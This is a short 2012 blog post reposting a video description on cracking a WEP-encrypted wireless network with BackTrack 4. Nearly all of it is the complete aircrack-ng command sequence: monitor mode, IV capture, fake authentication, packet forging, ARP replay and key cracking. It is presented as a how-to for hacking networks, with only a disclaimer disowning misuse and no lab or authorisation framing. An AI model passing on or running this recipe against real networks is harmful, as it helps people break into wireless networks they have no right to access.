Saturday, May 26, 2012

How to Hack a Wireless Network with WEP in BackTrack 4

How to Hack a Wireless Network with WEP in BackTrack 4 Tube. Duration : 10.07 Mins.


How to hack a wireless network pass key that uses WEP encryption. In this demonstration i was using backtrack 4 final release, which is a linux based operating system. Download this here: adf.ly The commands that were used... airmon-ng airmon-ng start wlan0 airodump-ng mon0 airodump-ng --bssid BSSID --channel # --ivs -w NAME mon0 aireplay-ng -5 -b BSSID mon0 aireplay-ng -1 1 -a BSSID mon0 packetforge-ng -0 -a BSSID 00:11:22:33:44:55 -l 255.255.255.255 -k 255.255.255.255 -y PACKETFILE -w arpy aireplay-ng -3 -r arpy -b BSSID mon0 aircrack-ng NAME-01.ivs ------------------------------------------------------------------- DISCLAIMER: I WILL NOT BE HELD RESPONSIBLE FOR WHAT YOU DO WITH THIS INFORMATION. THIS WAS MEANT TO SHOW HOW SIMPLE IT IS TO HACK INTO A WIRELESS NETWORK. WebSite: www.nickfrosty.com

Keywords: how, to, hack, crack, wireless, network, access, point, using, backtrack, back, track, fianl, release, linux, password, pass, key, wep, encryption

No comments:

Post a Comment